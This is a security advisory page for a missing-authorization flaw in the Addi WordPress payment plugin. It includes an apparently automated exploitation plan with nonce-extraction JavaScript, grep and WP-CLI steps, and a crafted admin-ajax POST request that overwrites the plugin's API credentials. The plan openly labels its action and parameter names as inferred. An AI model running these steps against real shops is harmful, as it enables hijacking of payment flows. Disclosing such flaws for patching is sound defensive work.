Addi – Cuotas que se adaptan a ti <= 2.0.4 - Missing Authorization
Description
The Addi – Cuotas que se adaptan a ti plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.4. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=2.0.4This exploitation research plan targets CVE-2026-27073, a Missing Authorization vulnerability in the "Addi – Cuotas que se adaptan a ti" plugin (version <= 2.0.4). ### 1. Vulnerability Summary The Addi plugin for WordPress fails to implement proper authorization checks (capability checks) on one or…
Show full research plan
This exploitation research plan targets CVE-2026-27073, a Missing Authorization vulnerability in the "Addi – Cuotas que se adaptan a ti" plugin (version <= 2.0.4).
1. Vulnerability Summary
The Addi plugin for WordPress fails to implement proper authorization checks (capability checks) on one or more AJAX handlers. Specifically, the plugin registers a function via wp_ajax_nopriv_ (or fails to check permissions in a wp_ajax_ handler) that allows unauthenticated users to modify plugin configurations or perform sensitive administrative actions. The vulnerability resides in the lack of current_user_can('manage_options') and potentially missing or incorrectly implemented nonce verification.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
addi_save_settingsoraddi_update_configuration(inferred) - Method: POST
- Authentication: Unauthenticated (leveraging
wp_ajax_nopriv_registration) - Payload Parameters:
action: The vulnerable AJAX action name.securityor_wpnonce: The nonce (if required).- Configuration parameters (e.g.,
addi_client_id,addi_secret_key,addi_ally_slug).
- Preconditions: The plugin must be active. If a nonce is required, it must be retrievable from the public frontend (e.g., product or checkout pages).
3. Code Flow (Inferred)
- Entry Point: An HTTP POST request is sent to
admin-ajax.php. - Hook Registration: The plugin registers the action:
add_action('wp_ajax_nopriv_addi_save_settings', 'addi_save_settings_callback');(inferred) - Callback Execution: The
addi_save_settings_callbackfunction is invoked. - Vulnerable Sink: Inside the callback, the code likely uses
update_option()orupdate_woocommerce_option()to save settings directly from$_POSTwithout callingcurrent_user_can(). - Persistence: The malicious settings are saved to the database, affecting all subsequent BNPL transactions.
4. Nonce Acquisition Strategy
If the plugin requires a nonce for the vulnerable action, it is likely exposed to facilitate frontend installment calculations on product or checkout pages.
- Identify Trigger: The Addi plugin typically displays installment information on WooCommerce product pages. This functionality often relies on AJAX and requires a nonce.
- Locate Script: Look for
wp_localize_scriptin the source code or browser console. The localization object is often namedaddi_vars,addi_params, oraddi_data(inferred). - Extraction:
- Navigate to a product page using
browser_navigate. - Execute
browser_evalto find the nonce:// Check for common localization objects window.addi_params?.nonce || window.addi_vars?.security || window.addi_data?.ajax_nonce
- Navigate to a product page using
- Bypass Check: If the nonce action in
wp_create_nonce(used for frontend) matches the action string incheck_ajax_referer(used for the vulnerable settings update), the frontend nonce can be used to authorize the attack.
5. Exploitation Strategy
The goal is to modify the Addi API credentials to redirect payment flows or disable the service.
Step 1: Discover the Exact Action and Nonce Key
Use the grep tool to find the registration:
grep -r "wp_ajax_nopriv" .
Verify the callback function for missing current_user_can calls.
Step 2: Setup Test Page
If a nonce is needed, ensure the Addi widget is active on a product page.
# Verify Addi settings in WooCommerce
wp option get woocommerce_addi_settings
Step 3: Perform the Exploit (Request via http_request)
Construct the POST request to admin-ajax.php.
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method: POST
- Headers:
Content-Type: application/x-www-form-urlencoded - Body:
(Note: Parameter names likeaction=addi_save_settings&addi_client_id=attacker_id&addi_client_secret=attacker_secret&security=[EXTRACTED_NONCE]addi_client_idare inferred and should be verified via grep in Step 1).
6. Test Data Setup
- Install/Activate: Ensure WooCommerce and the Addi plugin are active.
- Configure Addi: Set dummy valid-looking credentials via WP-CLI to provide a baseline:
wp option update woocommerce_addi_settings '{"client_id":"original_id","client_secret":"original_secret","ally_slug":"original_slug"}' --format=json - Public Page: Create a dummy product to ensure the Addi frontend scripts load:
wp post create --post_type=product --post_title="Test Product" --post_status=publish
7. Expected Results
- Response: The server should return a
200 OKor a JSON success message (e.g.,{"success":true}). - Database Change: The
woocommerce_addi_settingsoption (or similar) should now contain the attacker-supplied values. - Access: This modification was performed without any
CookieorAuthorizationheaders.
8. Verification Steps
After the exploit, verify the integrity of the settings using WP-CLI:
# Check if the settings were overwritten
wp option get woocommerce_addi_settings --format=json
Verify that the client_id or client_secret matches the "attacker" values used in the payload.
9. Alternative Approaches
- Init/Loaded Hook: If no
wp_ajax_noprivis found, check for functions hooked toinitorwp_loadedthat check for a specific$_GET['addi_action']parameter. - Missing Nonce: Attempt the exploit without the
securityparameter. If the response is still successful, the plugin completely lacks CSRF/Nonce protection. - WooCommerce API: Check if the plugin registers a custom WooCommerce API endpoint (e.g.,
wc-api/addi_callback) that might handle configuration updates insecurely.
Summary
The Addi – Cuotas que se adaptan a ti plugin for WordPress (<= 2.0.4) is vulnerable to unauthorized modification of settings due to missing capability checks and nonce verification in its AJAX handlers. Unauthenticated attackers can exploit this to change sensitive plugin configurations, such as API credentials, by sending a crafted request to the admin-ajax.php endpoint.
Exploit Outline
The exploit targets the `/wp-admin/admin-ajax.php` endpoint to perform unauthorized configuration changes. 1. Identify the Vulnerable Action: The attacker looks for AJAX actions registered via `wp_ajax_nopriv_` (such as `addi_save_settings` or `addi_update_configuration`) that handle the plugin's settings updates. 2. Nonce Acquisition: If the handler requires a nonce, the attacker navigates to a public-facing product page where the plugin typically displays installment information. They extract the nonce from the localized JavaScript objects (e.g., `window.addi_params.nonce`). 3. Payload Construction: The attacker crafts a POST request to `admin-ajax.php` with the vulnerable `action` and parameters representing the settings to be changed (e.g., `addi_client_id`, `addi_secret_key`). 4. Execution: No authentication is required. The attacker sends the request, and the plugin updates the `woocommerce_addi_settings` option in the database without verifying the user's administrative capabilities. 5. Impact: This allows the attacker to redirect Buy Now Pay Later (BNPL) payment flows or disable the service.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.